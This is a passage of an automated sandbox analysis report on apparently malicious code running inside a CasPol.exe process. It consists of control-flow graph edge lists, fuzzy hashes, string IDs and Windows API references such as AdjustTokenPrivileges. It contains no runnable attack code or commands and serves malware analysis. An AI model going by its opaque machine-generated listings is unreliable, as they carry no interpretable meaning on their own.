cd7e6a call 1d5f0606 1425->1614 1429->1366 1430->1429 1433 cd7e70-cd80d6 1602 cd80d7 call 1d5f05df 1433->1602 1603 cd80d7 call 1d5f0606 1433->1603 1459 cd80dd-cd81a7 1468 cd81ad-cd81ba 1459->1468 1469 cd87e9-cd880c 1459->1469 1470 cd8811-cd881e 1468->1470 1471 cd81c0-cd820f 1468->1471 1469->1470 1471->1469 1482 cd8215-cd8231 1471->1482 1483 cd8233-cd823a 1482->1483 1484 cd8242-cd8249 1482->1484 1483->1469 1486 cd8240 1483->1486 1484->1469 1485 cd824f-cd828a 1484->1485 1488 cd828c-cd82a5 1485->1488 1489 cd82a7-cd82af 1485->1489 1486->1485 1492 cd82b2-cd82fa 1488->1492 1489->1492 1497 cd87d0-cd87d6 1492->1497 1498 cd8300-cd8357 1492->1498 1497->1469 1499 cd87d8-cd87e1 1497->1499 1498->1497 1505 cd835d-cd8367 1498->1505 1499->1471 1500 cd87e7 1499->1500 1500->1470 1505->1497 1506 cd836d-cd8380 1505->1506 1506->1497 1507 cd8386-cd83ab 1506->1507 1511 cd8791-cd87b4 1507->1511 1512 cd83b1-cd83b4 1507->1512 1520 cd87b9-cd87bf 1511->1520 1512->1511 1513 cd83ba-cd8446 1512->1513 1531 cd844c-cd8488 1513->1531 1532 cd8590-cd8596 1513->1532 1520->1469 1521 cd87c1-cd87ca 1520->1521 1521->1497 1521->1507 1536 cd85ac-cd85b2 1531->1536 1548 cd848e-cd84c3 1531->1548 1533 cd8598-cd859a 1532->1533 1534 cd85a4 1532->1534 1533->1534 1534->1536 1537 cd85b4-cd85b6 1536->1537 1538 cd85c0-cd85c3 1536->1538 1537->1538 1540 cd85ce-cd85d4 1538->1540 1542 cd85d6-cd85d8 1540->1542 1543 cd85e2-cd85e5 1540->1543 1542->1543 1545 cd8535-cd8565 1543->1545 1550 cd8567-cd8585 1545->1550 1554 cd84c9-cd84ed 1548->1554 1555 cd85ea-cd8618 1548->1555 1558 cd861d-cd8672 1550->1558 1559 cd858b 1550->1559 1554->1555 1564 cd84f3-cd8529 1554->1564 1555->1550 1577 cd867c-cd8682 1558->1577 1578 cd8674-cd867a 1558->1578 1559->1520 1564->1540 1576 cd852f 1564->1576 1576->1545 1580 cd8684-cd8686 1577->1580 1581 cd8690 1577->1581 1579 cd8693-cd86b2 1578->1579 1584 cd86ce-cd874e 1579->1584 1585 cd86b4-cd86bd 1579->1585 1580->1581 1581->1579 1599 cd8761-cd878f 1584->1599 1600 cd8750-cd875a 1584->1600 1585->1584 1586 cd86bf-cd86c7 1585->1586 1586->1584 1599->1520 1600->1599 1602->1459 1603->1459 1604->1377 1605->1377 1606->1377 1607->1377 1608->1377 1609->1420 1610->1420 1611->1420 1612->1420 1613->1433 1614->1433
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: r$ r$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-988043974
                                          • Opcode ID: 0d7b979bb3c96d0d23bd9686a2a1f70e27cec9b22326975a6c5ab4073b13fe9f
                                          • Instruction ID: 2cd5f0c58d16396f1c455888d7444bef5633e68fc24d18f1635a39e37e2de86f
                                          • Opcode Fuzzy Hash: 0d7b979bb3c96d0d23bd9686a2a1f70e27cec9b22326975a6c5ab4073b13fe9f
                                          • Instruction Fuzzy Hash: E0927135A002288FDB15DF74C898B9DB7F2AF89300F1585AAE50AAB361DF719D45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CDC323 Relevance: 18.2, Strings: 14, Instructions: 738COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$*r$*r$*r
                                          • API String ID: 0-2268267026
                                          • Opcode ID: 6e962d6e5a9f1d7c6b84878082006dc61bd95f2ece30bb11c41046d53de93290
                                          • Instruction ID: 612bf23885deb36ad61175ab924d99db7d43bf6d4a746b9d1e87eb4abdb29c63
                                          • Opcode Fuzzy Hash: 6e962d6e5a9f1d7c6b84878082006dc61bd95f2ece30bb11c41046d53de93290
                                          • Instruction Fuzzy Hash: 0B52C430A002458FEF24DFB8C994BADBBB2AF85304F24C16AD2199F396CA35DD45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CD5128 Relevance: 18.2, Strings: 14, Instructions: 673COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1848 cd5128-cd515c 1851 cd5167-cd51af 1848->1851 1856 cd5b1c-cd5b29 1851->1856 1857 cd51b5-cd51cf 1851->1857 1857->1856 1859 cd51d5-cd51e4 1857->1859 1860 cd51ea-cd5204 1859->1860 1861 cd5ad2-cd5b34 1859->1861 1864 cd520a-cd52e7 1860->1864 1865 cd5a67-cd5a7a 1860->1865 1893 cd533d-cd5347 1864->1893 1894 cd52e9-cd5329 1864->1894 1867 cd5a81-cd5a85 1865->1867 1869 cd5a87 1867->1869 1870 cd5a90-cd5a91 1867->1870 1869->1870 1870->1861 1897 cd534d-cd537d 1893->1897 1894->1893 1899 cd532b-cd533b 1894->1899 1904 cd537f-cd5392 1897->1904 1905 cd5397-cd53ac 1897->1905 1899->1897 1904->1867 1907 cd5a7c 1905->1907 1908 cd53b2-cd53bf 1905->1908 1907->1867 1908->1865 1909 cd53c5-cd5414 1908->1909 1909->1907 1917 cd541a-cd5436 1909->1917 1918 cd5438-cd543f 1917->1918 1919 cd5447-cd544e 1917->1919 1918->1907 1920 cd5445 1918->1920 1919->1907 1921 cd5454-cd54aa 1919->1921 1920->1921 1926 cd5a50-cd5a56 1921->1926 1927 cd54b0-cd5507 1921->1927 1926->1907 1928 cd5a58-cd5a61 1926->1928 1927->1926 1933 cd550d-cd5517 1927->1933 1928->1865 1928->1909 1933->1926 1934 cd551d-cd5530 1933->1934 1934->1926 1935 cd5536-cd555b 1934->1935 1939 cd5a11-cd5a34 1935->1939 1940 cd5561-cd5564 1935->1940 1948 cd5a39-cd5a3f 1939->1948 1940->1939 1941 cd556a-cd5606 1940->1941 1959 cd560c-cd5648 1941->1959 1960 cd5748-cd574e 1941->1960 1948->1907 1949 cd5a41-cd5a4a 1948->1949 1949->1926 1949->1935 1964 cd5764-cd576a 1959->1964 1976 cd564e-cd567e 1959->1976 1961 cd575c 1960->1961 1962 cd5750-cd5752 1960->1962 1961->1964 1962->1961 1966 cd576c-cd576e 1964->1966 1967 cd5778-cd577b 1964->1967 1966->1967 1969 cd5786-cd578c 1967->1969 1970 cd578e-cd5790 1969->1970 1971 cd579a-cd579d 1969->1971 1970->1971 1973 cd56f0-cd571d 1971->1973 1978 cd571f-cd573d 1973->1978 1982 cd5684-cd56a8 1976->1982 1983 cd57a2-cd57d0 1976->1983 1985 cd57fd-cd5852 1978->1985 1986 cd5743 1978->1986 1982->1983 1992 cd56ae-cd56e4 1982->1992 1983->1978 2005 cd585c-cd5862 1985->2005 2006 cd5854-cd585a 1985->2006 1986->1948 1992->1969 2004 cd56ea 1992->2004 2004->1973 2008 cd5864-cd5866 2005->2008 2009 cd5870 2005->2009 2007 cd5873-cd5887 2006->2007 2007->1948 2012 cd588d-cd58b6 2007->2012 2008->2009 2009->2007 2017 cd58bd-cd591f 2012->2017 2018 cd58b8 2012->2018 2026 cd5926-cd595c 2017->2026 2027 cd5921 2017->2027 2018->2017 2026->1948 2032 cd5962-cd59d3 2026->2032 2027->2026 2042 cd59d5-cd59df 2032->2042 2043 cd59e6-cd5a0f 2032->2043 2042->2043 2043->1948
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: r$ r$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-988043974
                                          • Opcode ID: 8052b89c6b66771d7c6681e686870de6a3f30f992238be5b848946f383a288fe
                                          • Instruction ID: 664a28a7a35deacab200faa2f00a096cceed05d37dc4476553be3f5c07ef369d
                                          • Opcode Fuzzy Hash: 8052b89c6b66771d7c6681e686870de6a3f30f992238be5b848946f383a288fe
                                          • Instruction Fuzzy Hash: 69425D75A006248FDB24DFB8C8947ADB7F2AF88300F1585AAD61AEB351EB349D41CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CDDEC8 Relevance: 14.4, Strings: 11, Instructions: 670COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0Xr$\Or$\Or$\Or$\Or$\Or$*r$*r$*r$*r$*r
                                          • API String ID: 0-4274820399
                                          • Opcode ID: c39bcf3550748dba41eb5e1128e7f7da545445e11d17415f8ef6ab7473c00ac7
                                          • Instruction ID: 738a7557d1afcec5c33121ca62b62c982ec06aa82959a3c4e166ecdc99503cfb
                                          • Opcode Fuzzy Hash: c39bcf3550748dba41eb5e1128e7f7da545445e11d17415f8ef6ab7473c00ac7
                                          • Instruction Fuzzy Hash: 2832A330F042048FEB24EBA8C8947AEB7B2EF95310F25846AE219EF391DA35DD45D751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F82D720 Relevance: 9.6, Strings: 7, Instructions: 873COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2262 1f82d720-1f82d728 2263 1f82d729-1f82d72f 2262->2263 2264 1f82d730-1f82d7b5 2263->2264 2265 1f82db11-1f82db37 2263->2265 2317 1f82d875-1f82d8e2 call 1f821518 2264->2317 2318 1f82d7bb-1f82d86d 2264->2318 2268 1f82db39-1f82db43 2265->2268 2269 1f82db5c-1f82db7e 2265->2269 2270 1f82db45-1f82db56 call 1f820538 2268->2270 2271 1f82db58-1f82db5b 2268->2271 2276 1f82db80-1f82db87 2269->2276 2277 1f82db9e-1f82dba6 call 1f820538 2269->2277 2270->2271 2279 1f82db89-1f82db93 2276->2279 2280 1f82dbac-1f82dbce 2276->2280 2283 1f82dba8-1f82dbab 2277->2283 2282 1f82db95-1f82db9c 2279->2282 2279->2283 2287 1f82dbd0-1f82dbd4 2280->2287 2288 1f82dbee 2280->2288 2282->2277 2290 1f82dbd6-1f82dbdd 2287->2290 2291 1f82dbf4-1f82dc1f 2287->2291 2292 1f82dbf0-1f82dbf3 2288->2292 2290->2292 2293 1f82dbdf-1f82dbe9 call 1f820538 2290->2293 2298 1f82dc21-1f82dc2b 2291->2298 2299 1f82dc44-1f82dc6f 2291->2299 2293->2288 2300 1f82dc40-1f82dc43 2298->2300 2301 1f82dc2d-1f82dc3e call 1f820538 2298->2301 2305 1f82dc71-1f82dc7b 2299->2305 2306 1f82dc94-1f82dcbf 2299->2306 2301->2300 2308 1f82dc90-1f82dc93 2305->2308 2309 1f82dc7d-1f82dc8e call 1f820538 2305->2309 2315 1f82dcc1-1f82dccb 2306->2315 2316 1f82dce4-1f82dcea 2306->2316 2309->2308 2319 1f82dce0-1f82dce3 2315->2319 2320 1f82dccd-1f82dcde call 1f820538 2315->2320 2341 1f82d9c6-1f82da2c 2317->2341 2342 1f82d8e8-1f82d94f 2317->2342 2318->2317 2320->2319 2362 1f82da32-1f82da3a 2341->2362 2363 1f82dac0-1f82dacc 2341->2363 2342->2265 2361 1f82d955-1f82d95d 2342->2361 2361->2265 2364 1f82d963-1f82d98c 2361->2364 2366 1f82da54-1f82da5b 2362->2366 2367 1f82da3c-1f82da42 2362->2367 2363->2265 2365 1f82dace-1f82dae1 2363->2365 2375 1f82d9b2-1f82d9be 2364->2375 2376 1f82d98e-1f82d992 2364->2376 2369 1f82db0c 2365->2369 2370 1f82dae3-1f82daf7 2365->2370 2368 1f82da61-1f82da9d 2366->2368 2366->2369 2371 1f82da46-1f82da52 2367->2371 2372 1f82da44 2367->2372 2368->2265 2387 1f82da9f-1f82dab5 2368->2387 2369->2265 2370->2369 2380 1f82daf9-1f82dafb 2370->2380 2371->2366 2372->2366 2375->2341 2376->2265 2379 1f82d998-1f82d9af 2376->2379 2379->2375 2391 1f82dafe call 1d5f05df 2380->2391 2392 1f82dafe call 1d5f0606 2380->2392 2384 1f82db04-1f82db0b 2387->2369 2390 1f82dab7-1f82daba 2387->2390 2390->2263 2390->2363 2391->2384 2392->2384
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or$*r$*r
                                          • API String ID: 0-548486589
                                          • Opcode ID: e8765b6fc04f06593b7307ba12f2d7195129e4afc199a0db1dbd41f0d67778b2
                                          • Instruction ID: a47af2811b15cc38be98bbaa16bbb6e1bfcf7967287ec0ede3d22a91616af3a9
                                          • Opcode Fuzzy Hash: e8765b6fc04f06593b7307ba12f2d7195129e4afc199a0db1dbd41f0d67778b2
                                          • Instruction Fuzzy Hash: 83028D75B042559FEB08CBB8C894B5E7BF2AF89304F19806AE505AF392DA34EC45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC1960 Relevance: 6.8, Strings: 5, Instructions: 506COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2517 cc1960-cc196f 2518 cc1994-cc19ac 2517->2518 2519 cc1971-cc197b 2517->2519 2525 cc19ae-cc19b6 2518->2525 2526 cc193a-cc193d 2518->2526 2520 cc197d-cc198e 2519->2520 2521 cc1990 2519->2521 2520->2521 2522 cc1992-cc1993 2521->2522 2527 cc19b8-cc19bf 2525->2527 2528 cc19d6-cc19db 2525->2528 2529 cc19e4-cc1a0f 2527->2529 2530 cc19c1-cc19cb 2527->2530 2528->2522 2535 cc1a34 2529->2535 2536 cc1a11-cc1a1b 2529->2536 2531 cc19cd-cc19d4 2530->2531 2532 cc19e0-cc19e3 2530->2532 2531->2528 2539 cc1a39-cc1a48 2535->2539 2537 cc1a1d-cc1a2e 2536->2537 2538 cc1a30-cc1a33 2536->2538 2537->2538 2539->2539 2541 cc1a4a-cc1a88 call 1f825cf0 2539->2541 2665 cc1a8a call 1d5f05df 2541->2665 2666 cc1a8a call 1d5f0606 2541->2666 2545 cc1a90-cc1a92 2546 cc1a99-cc1aab 2545->2546 2549 cc1aad-cc1aaf 2546->2549 2550 cc1ab4-cc1afb 2546->2550 2551 cc1fae-cc1fb7 2549->2551 2560 cc1afd-cc1aff 2550->2560 2561 cc1b04-cc1b07 2550->2561 2560->2551 2562 cc1b0d-cc1b17 2561->2562 2563 cc1f80 2561->2563 2564 cc1f7c-cc1f7e 2562->2564 2565 cc1b1d-cc1b51 2562->2565 2566 cc1f85-cc1fa9 2563->2566 2564->2551 2565->2566 2574 cc1b57-cc1b73 2565->2574 2566->2551 2574->2566 2578 cc1b79-cc1b83 2574->2578 2578->2566 2579 cc1b89-cc1b9f 2578->2579 2579->2566 2581 cc1ba5-cc1e01 2579->2581 2581->2566 2626 cc1e07-cc1e0f 2581->2626 2626->2566 2627 cc1e15-cc1e1d 2626->2627 2627->2566 2628 cc1e23-cc1e44 2627->2628 2630 cc1e5e-cc1e68 2628->2630 2631 cc1e46-cc1e4a 2628->2631 2632 cc1eac-cc1eb3 2630->2632 2633 cc1e6a-cc1e6e 2630->2633 2631->2566 2634 cc1e50-cc1e5b 2631->2634 2636 cc1eca-cc1ee4 2632->2636 2637 cc1eb5-cc1eb9 2632->2637 2633->2566 2635 cc1e74-cc1ea9 2633->2635 2634->2630 2635->2632 2647 cc1f68-cc1f6e 2636->2647 2648 cc1eea-cc1efc 2636->2648 2637->2566 2639 cc1ebf-cc1ec7 2637->2639 2639->2636 2647->2563 2649 cc1f70-cc1f76 2647->2649 2648->2647 2653 cc1efe-cc1f46 2648->2653 2649->2564 2649->2565 2661 cc1f48-cc1f4c 2653->2661 2662 cc1f53-cc1f65 2653->2662 2661->2662 2662->2647 2665->2545 2666->2545
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Or$\Or$\Or$\Or$\Or
                                          • API String ID: 0-2346101514
                                          • Opcode ID: 104e993bdd6c025e363c93d4b90ce91ed43fa232c8e9773243e0933769f6089a
                                          • Instruction ID: b793ed957f80aecf6f7da4dfe4562150d56f7651bc58040df04af4334a90d227
                                          • Opcode Fuzzy Hash: 104e993bdd6c025e363c93d4b90ce91ed43fa232c8e9773243e0933769f6089a
                                          • Instruction Fuzzy Hash: 07028C70A003149FEB14DBB9C898B6EB7F2AF85304F29852EE51A9B395DE34DC05C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CDB5B8 Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6430 cdb5b8-cdb5e5 6433 cdb5ee-cdb603 LdrInitializeThunk 6430->6433 6434 cdb60a-cdb616 6433->6434 6435 cdb85d-cdb86b 6434->6435 6436 cdb61c-cdb625 6434->6436 6439 cdb86e-cdb870 6435->6439 6437 cdb62b-cdb640 6436->6437 6438 cdb892 6436->6438 6443 cdb65a-cdb675 6437->6443 6444 cdb642-cdb655 6437->6444 6440 cdb897-cdb898 6438->6440 6439->6440 6440->6439 6442 cdb89a-cdb89b 6440->6442 6445 cdb89d-cdb8a1 6442->6445 6446 cdb8a6 6442->6446 6458 cdb677-cdb681 6443->6458 6459 cdb683 6443->6459 6447 cdb831-cdb835 6444->6447 6445->6446 6448 cdb8a7 6446->6448 6450 cdb837 6447->6450 6451 cdb840-cdb849 6447->6451 6448->6448 6450->6451 6455 cdb88d 6451->6455 6456 cdb84b-cdb857 6451->6456 6455->6438 6456->6435 6456->6436 6460 cdb688-cdb68a 6458->6460 6459->6460 6461 cdb68c-cdb69f 6460->6461 6462 cdb6a4-cdb73d 6460->6462 6461->6447 6480 cdb73f-cdb749 6462->6480 6481 cdb74b 6462->6481 6482 cdb750-cdb752 6480->6482 6481->6482 6483 cdb7a8-cdb7ec 6482->6483 6484 cdb754-cdb756 6482->6484 6499 cdb7fc-cdb82f 6483->6499 6500 cdb7ee-cdb7f5 6483->6500 6485 cdb758-cdb762 6484->6485 6486 cdb764 6484->6486 6488 cdb769-cdb76b 6485->6488 6486->6488 6488->6483 6489 cdb76d-cdb7a6 6488->6489 6489->6483 6499->6447 6500->6499
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 207a60b354b48d6b0112a61d1ddcb6b77f18074a86d774b7ba8c83c0023ffea8
                                          • Instruction ID: f778e9a319162bf79f6e5ad02123de1b1cee34fbc63298612f1c70bb2dd48feb
                                          • Opcode Fuzzy Hash: 207a60b354b48d6b0112a61d1ddcb6b77f18074a86d774b7ba8c83c0023ffea8
                                          • Instruction Fuzzy Hash: EC714034A00215DFDB14DFB4C998BAEBBF2AF84311F168529E906A7394DB38DD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AA7F Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D45AAFF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdjustPrivilegesToken
                                          • String ID:
                                          • API String ID: 2874748243-0
                                          • Opcode ID: 0427b5c963be8f39573eb14f37102206bca31edc78e6898001bba75521ec01d1
                                          • Instruction ID: a697c94d9ad9a9f8b188a9002c64490f8703bb4b143267aa471d954a653d6e54
                                          • Opcode Fuzzy Hash: 0427b5c963be8f39573eb14f37102206bca31edc78e6898001bba75521ec01d1
                                          • Instruction Fuzzy Hash: EA21D176509780AFDB12CF25DC41B52BFF4EF06310F0885DAE9848F263D271A808DB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AAB6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D45AAFF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdjustPrivilegesToken
                                          • String ID:
                                          • API String ID: 2874748243-0
                                          • Opcode ID: 6c5b11327b01cf13e9706e1f995f88ceedb4ce87a2f58365449997127823be39
                                          • Instruction ID: 8cbc78dc1140f4c365c3bf1fa85a3b9725a3b78e2c31f92c74d8374060ecc8cc
                                          • Opcode Fuzzy Hash: 6c5b11327b01cf13e9706e1f995f88ceedb4ce87a2f58365449997127823be39
                                          • Instruction Fuzzy Hash: 5011A0755003409FEB11CF55D985B56FBE4EF08220F08C46AEE498B652D371E854DFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AFB8 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtQuerySystemInformation.NTDLL ref: 1D45B015
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationQuerySystem
                                          • String ID:
                                          • API String ID: 3562636166-0
                                          • Opcode ID: 8e0a8a221e9f7f72562058db96a446d059b8dbec3e96ff826b965bfe6c30f104
                                          • Instruction ID: 71411c2495b15deb3502e5707c2799fe8e2be1cc6a8c9394b1a7a7b04c0129a2
                                          • Opcode Fuzzy Hash: 8e0a8a221e9f7f72562058db96a446d059b8dbec3e96ff826b965bfe6c30f104
                                          • Instruction Fuzzy Hash: 8211A375408780AFD7128F15DC44B52FFB4EF46214F09849EED844B253D275A818CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AFDA Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtQuerySystemInformation.NTDLL ref: 1D45B015
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationQuerySystem
                                          • String ID:
                                          • API String ID: 3562636166-0
                                          • Opcode ID: 332c373415b09629e1b0d2606dbe0fbef8b6c46c446f1fd645b8e68adf24445f
                                          • Instruction ID: 7c48a97c3fbde660ad5f7456130d4f558a0a6e49fe6db4b2b6226740778da015
                                          • Opcode Fuzzy Hash: 332c373415b09629e1b0d2606dbe0fbef8b6c46c446f1fd645b8e68adf24445f
                                          • Instruction Fuzzy Hash: 58018F354007409FEB21CF05D984B15FBA0EF08A20F08C19ADE580B352D275A819CF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC4280 Relevance: .9, Instructions: 896COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9919c65029d97047e4b36e2d6999bf38c22be10c165262e19d8265a1cf1ae69e
                                          • Instruction ID: 771da8f34343bc28f45d97def3a70fd1cfb51fe999766f82a31e9e985491cc7b
                                          • Opcode Fuzzy Hash: 9919c65029d97047e4b36e2d6999bf38c22be10c165262e19d8265a1cf1ae69e
                                          • Instruction Fuzzy Hash: 65624B34B002158FEB08DBB8C5A4BADB7F2AF88314F258569D406EB395DB39DD42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CDB930 Relevance: .8, Instructions: 791COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea8d35935fea81563c588c7b0e33931bdf476385bf64eb4caa971633d890c679
                                          • Instruction ID: c2d5e0511bd64a1d41d488d83f6a91fbd566505e1af29503f843fcc44d00a781
                                          • Opcode Fuzzy Hash: ea8d35935fea81563c588c7b0e33931bdf476385bf64eb4caa971633d890c679
                                          • Instruction Fuzzy Hash: E5526034B002159FDB54DBB8C4987AE7BF2AF88310F25856AE506EB395DF34DC068B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1F824FA0 Relevance: .5, Instructions: 486COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6694091498.000000001F820000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F820000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1f820000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4a75b76fbdfe27509a1e43ab71eacd62d141e959557e3ae5858a35419a7dcc09
                                          • Instruction ID: 872f4a70f82951836d8464d0fb8ac8e99d08d1355bbb318f206b068e05e7a75b
                                          • Opcode Fuzzy Hash: 4a75b76fbdfe27509a1e43ab71eacd62d141e959557e3ae5858a35419a7dcc09
                                          • Instruction Fuzzy Hash: BA025C35A402059FDB04DB68C994AAEB7F2EF89310F558529E40ADF394EB35EC42CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CDDA77 Relevance: .4, Instructions: 406COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3946c56dbd67fc2ed4a9c2ea19922c1021b358a879126f20dd7fba215e03f538
                                          • Instruction ID: 68135c36611df4858dfbbb5031a1485bb9e62226593639e6cd098075a62d7756
                                          • Opcode Fuzzy Hash: 3946c56dbd67fc2ed4a9c2ea19922c1021b358a879126f20dd7fba215e03f538
                                          • Instruction Fuzzy Hash: 5BD1D331E043059FDB20DB68C88076ABBF2EF96314F10896BD25ACB751D631ED4AC751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CD4B20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
